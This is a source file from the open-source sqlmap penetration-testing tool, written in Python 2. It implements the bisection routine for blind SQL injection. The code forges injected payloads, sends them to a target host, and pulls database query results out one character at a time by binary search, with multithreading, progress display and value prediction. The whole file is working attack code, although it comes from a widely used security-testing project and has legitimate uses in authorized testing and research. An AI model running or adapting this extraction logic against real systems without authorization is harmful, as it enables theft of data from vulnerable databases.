#!/usr/bin/env python """ $Id$ This file is part of the sqlmap project, http://sqlmap.sourceforge.net. Copyright (c) 2007-2010 Bernardo Damele A. G. Copyright (c) 2006 Daniele Bellucci sqlmap is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation version 2 of the License. sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with sqlmap; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA """ import threading import time import traceback from lib.core.agent import agent from lib.core.common import dataToSessionFile from lib.core.common import dataToStdout from lib.core.common import getCharset from lib.core.common import goGoodSamaritan from lib.core.common import getPartRun from lib.core.common import replaceNewlineTabs from lib.core.common import safeStringFormat from lib.core.convert import urlencode from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.exception import sqlmapConnectionException from lib.core.exception import sqlmapValueException from lib.core.exception import sqlmapThreadException from lib.core.exception import unhandledException from lib.core.progress import ProgressBar from lib.core.unescaper import unescaper from lib.request.connect import Connect as Request def bisection(payload, expression, length=None, charsetType=None, firstChar=None, lastChar=None): """ Bisection algorithm that can be used to perform blind SQL injection on an affected host """ partialValue = "" finalValue = "" asciiTbl = getCharset(charsetType) # Set kb.partRun in case "common prediction" feature (a.k.a. "good # samaritan") is used kb.partRun = getPartRun() if conf.useCommonPrediction else None if "LENGTH(" in expression or "LEN(" in expression: firstChar = 0 elif conf.firstChar is not None and ( isinstance(conf.firstChar, int) or ( isinstance(conf.firstChar, basestring) and conf.firstChar.isdigit() ) ): firstChar = int(conf.firstChar) - 1 elif firstChar is None: firstChar = 0 elif ( isinstance(firstChar, basestring) and firstChar.isdigit() ) or isinstance(firstChar, int): firstChar = int(firstChar) - 1 if "LENGTH(" in expression or "LEN(" in expression: lastChar = 0 elif conf.lastChar is not None and ( isinstance(conf.lastChar, int) or ( isinstance(conf.lastChar, basestring) and conf.lastChar.isdigit() ) ): lastChar = int(conf.lastChar) elif lastChar in ( None, "0" ): lastChar = 0 elif ( isinstance(lastChar, basestring) and lastChar.isdigit() ) or isinstance(lastChar, int): lastChar = int(lastChar) if kb.dbmsDetected: _, _, _, _, _, _, fieldToCastStr = agent.getFields(expression) nulledCastedField = agent.nullAndCastField(fieldToCastStr) expressionReplaced = expression.replace(fieldToCastStr, nulledCastedField, 1) expressionUnescaped = unescaper.unescape(expressionReplaced) else: expressionUnescaped = unescaper.unescape(expression) debugMsg = "query: %s" % expressionUnescaped logger.debug(debugMsg) if length and not isinstance(length, int) and length.isdigit(): length = int(length) if length == 0: return 0, "" if lastChar > 0 and length > ( lastChar - firstChar ): length = ( lastChar - firstChar ) showEta = conf.eta and isinstance(length, int) numThreads = min(conf.threads, length) threads = [] if showEta: progress = ProgressBar(maxValue=length) progressTime = [] if numThreads is not None: debugMsg = "starting %d thread%s" % (numThreads, ("s" if numThreads > 1 else "")) logger.debug(debugMsg) if conf.verbose >= 1 and not showEta: if isinstance(length, int) and conf.threads > 1: dataToStdout("[%s] [INFO] retrieved: %s" % (time.strftime("%X"), "_" * min(length, conf.progressWidth))) dataToStdout("\r[%s] [INFO] retrieved: " % time.strftime("%X")) else: dataToStdout("[%s] [INFO] retrieved: " % time.strftime("%X")) queriesCount = [0] # As list to deal with nested scoping rules hintlock = threading.Lock() def tryHint(idx): hintlock.acquire() hintValue = kb.hintValue hintlock.release() if hintValue is not None and len(hintValue) >= idx: if kb.dbms == "SQLite": posValue = hintValue[idx-1] else: posValue = ord(hintValue[idx-1]) forgedPayload = safeStringFormat(payload.replace('%3E', '%3D'), (expressionUnescaped, idx, posValue)) queriesCount[0] += 1 result = Request.queryPage(urlencode(forgedPayload)) if result: return hintValue[idx-1] hintlock.acquire() kb.hintValue = None hintlock.release() return None def getChar(idx, charTbl=asciiTbl, continuousOrder=True): # continuousOrder means that distance between each two neighbour's numerical values is exactly 1 result = tryHint(idx) if result: return result if not continuousOrder: originalTbl = list(charTbl) else: shiftTable = [5, 4] # used for gradual expanding into unicode charspace if len(charTbl) == 1: forgedPayload = safeStringFormat(payload.replace('%3E', '%3D'), (expressionUnescaped, idx, charTbl[0])) queriesCount[0] += 1 result = Request.queryPage(urlencode(forgedPayload)) if result: return chr(charTbl[0]) if charTbl[0] < 128 else unichr(charTbl[0]) else: return None maxChar = maxValue = charTbl[-1] minChar = minValue = charTbl[0] while len(charTbl) != 1: position = (len(charTbl) >> 1) posValue = charTbl[position] if kb.dbms == "SQLite": posValueOld = posValue posValue = chr(posValue) if posValue < 128 else unichr(posValue) if not conf.useBetween or kb.dbms == "SQLite": forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx, posValue)) else: forgedPayload = safeStringFormat(payload.replace('%3E', 'NOT BETWEEN 0 AND'), (expressionUnescaped, idx, posValue)) queriesCount[0] += 1 result = Request.queryPage(urlencode(forgedPayload)) if kb.dbms == "SQLite": posValue = posValueOld if result: minValue = posValue if type(charTbl) != xrange: charTbl = charTbl[position:] else: # xrange - extended virtual charset used for memory/space optimization charTbl = xrange(charTbl[position], charTbl[-1] + 1) else: maxValue = posValue if type(charTbl) != xrange: charTbl = charTbl[:position] else: charTbl = xrange(charTbl[0], charTbl[position]) if len(charTbl) == 1: if continuousOrder: if maxValue == 1: return None elif minValue == maxChar: # going beyond the original charset # if the original charTbl was [0,..,127] new one will be [128,..,128*16-1] or from 128 to 2047 # and instead of making a HUGE list with all elements we use here xrange, which is a virtual list if shiftTable: charTbl = xrange(maxChar + 1, (maxChar + 1) << shiftTable.pop()) maxChar = maxValue = charTbl[-1] minChar = minValue = charTbl[0] else: return None else: retVal = minValue + 1 return chr(retVal) if retVal < 128 else unichr(retVal) else: if minValue == maxChar or maxValue == minChar: return None for retVal in (originalTbl[originalTbl.index(minValue)], originalTbl[originalTbl.index(minValue) + 1]): # if we are working with non-continuous set both minValue and character afterwards are possible candidates forgedPayload = safeStringFormat(payload.replace('%3E', '%3D'), (expressionUnescaped, idx, retVal)) queriesCount[0] += 1 result = Request.queryPage(urlencode(forgedPayload)) if result: return chr(retVal) if retVal < 128 else unichr(retVal) return None def etaProgressUpdate(charTime, index): if len(progressTime) <= ( (length * 3) / 100 ): eta = 0 else: midTime = sum(progressTime) / len(progressTime) midTimeWithLatest = (midTime + charTime) / 2 eta = midTimeWithLatest * (length - index) / conf.threads progressTime.append(charTime) progress.update(index) progress.draw(eta) if conf.threads > 1 and isinstance(length, int) and length > 1: value = [ None ] * length index = [ firstChar ] # As list for python nested function scoping idxlock = threading.Lock() iolock = threading.Lock() valuelock = threading.Lock() conf.seqLock = threading.Lock() conf.threadContinue = True def downloadThread(): try: while conf.threadContinue: idxlock.acquire() if index[0] >= length: idxlock.release() return index[0] += 1 curidx = index[0] idxlock.release() if conf.threadContinue: charStart = time.time() val = getChar(curidx) if val is None: raise sqlmapValueException, "failed to get character at index %d (expected %d total)" % (curidx, length) else: break valuelock.acquire() value[curidx-1] = val currentValue = list(value) valuelock.release() if conf.threadContinue: if showEta: etaProgressUpdate(time.time() - charStart, index[0]) elif conf.verbose >= 1: startCharIndex = 0 endCharIndex = 0 for i in xrange(length): if currentValue[i] is not None: endCharIndex = max(endCharIndex, i) output = '' if endCharIndex > conf.progressWidth: startCharIndex = endCharIndex - conf.progressWidth count = 0 for i in xrange(startCharIndex, endCharIndex + 1): output += '_' if currentValue[i] is None else currentValue[i] for i in xrange(length): count += 1 if currentValue[i] is not None else 0 if startCharIndex > 0: output = '..' + output[2:] if (endCharIndex - startCharIndex == conf.progressWidth) and (endCharIndex < length-1): output = output[:-2] + '..' output += '_' * (min(length, conf.progressWidth) - len(output)) status = ' %d/%d (%d%s)' % (count, length, round(100.0*count/length), '%') output += status if count != length else " "*len(status) iolock.acquire() dataToStdout("\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), replaceNewlineTabs(output, stdout=True))) iolock.release() except (sqlmapConnectionException, sqlmapValueException), errMsg: print conf.threadException = True logger.error("thread %d: %s" % (numThread + 1, errMsg)) except KeyboardInterrupt: conf.threadException = True print logger.debug("waiting for threads to finish") try: while (threading.activeCount() > 1): pass except KeyboardInterrupt: raise sqlmapThreadException, "user aborted" except: print conf.threadException = True errMsg = unhandledException() logger.error("thread %d: %s" % (numThread + 1, errMsg)) traceback.print_exc() # Start the threads for numThread in range(numThreads): thread = threading.Thread(target=downloadThread) thread.start() threads.append(thread) # And wait for them to all finish try: alive = True while alive: alive = False for thread in threads: if thread.isAlive(): alive = True thread.join(5) except KeyboardInterrupt: conf.threadContinue = False raise infoMsg = None # If we have got one single character not correctly fetched it # can mean that the connection to the target url was lost if None in value: for v in value: if isinstance(v, basestring) and v is not None: partialValue += v if partialValue: finalValue = partialValue infoMsg = "\r[%s] [INFO] partially retrieved: %s" % (time.strftime("%X"), finalValue) else: finalValue = "".join(value) infoMsg = "\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), finalValue) if isinstance(finalValue, basestring) and len(finalValue) > 0: dataToSessionFile(replaceNewlineTabs(finalValue)) if conf.verbose >= 1 and not showEta and infoMsg: dataToStdout(infoMsg) conf.seqLock = None else: index = firstChar while True: index += 1 charStart = time.time() # Common prediction feature (a.k.a. "good samaritan") # NOTE: to be used only when multi-threading is not set for # the moment if conf.useCommonPrediction and len(finalValue) > 0 and kb.partRun is not None: val = None singleValue, commonCharset, otherCharset = goGoodSamaritan(kb.partRun, finalValue, asciiTbl) # If there is one single output in common-outputs, check # it via equal against the query output if singleValue is not None: # One-shot query containing equals singleValue query = agent.prefixQuery(" %s" % safeStringFormat('AND (%s) = %s', (expressionUnescaped, unescaper.unescape('\'%s\'' % singleValue)))) query = agent.postfixQuery(query) queriesCount[0] += 1 result = Request.queryPage(urlencode(agent.payload(newValue=query))) # Did we have luck? if result: dataToSessionFile(replaceNewlineTabs(singleValue[index-1:])) if showEta: etaProgressUpdate(time.time() - charStart, len(singleValue)) elif conf.verbose >= 1: dataToStdout(singleValue[index-1:]) finalValue = singleValue break # Otherwise if there is no singleValue (single match from # txt/common-outputs.txt) use the returned common # charset only to retrieve the query output if commonCharset: val = getChar(index, commonCharset, False) # If we had no luck with singleValue and common charset, # use the returned other charset if not val: val = getChar(index, otherCharset, otherCharset == asciiTbl) else: val = getChar(index, asciiTbl) if val is None or ( lastChar > 0 and index > lastChar ): break finalValue += val dataToSessionFile(replaceNewlineTabs(val)) if showEta: etaProgressUpdate(time.time() - charStart, index) elif conf.verbose >= 1: dataToStdout(val) if conf.verbose >= 1 or showEta: dataToStdout("\n") if ( conf.verbose in ( 1, 2 ) and showEta ) or conf.verbose >= 3: infoMsg = "retrieved: %s" % finalValue logger.info(infoMsg) if not partialValue: dataToSessionFile("]\n") if conf.threadException: raise sqlmapThreadException, "something unexpected happened inside the threads" return queriesCount[0], finalValue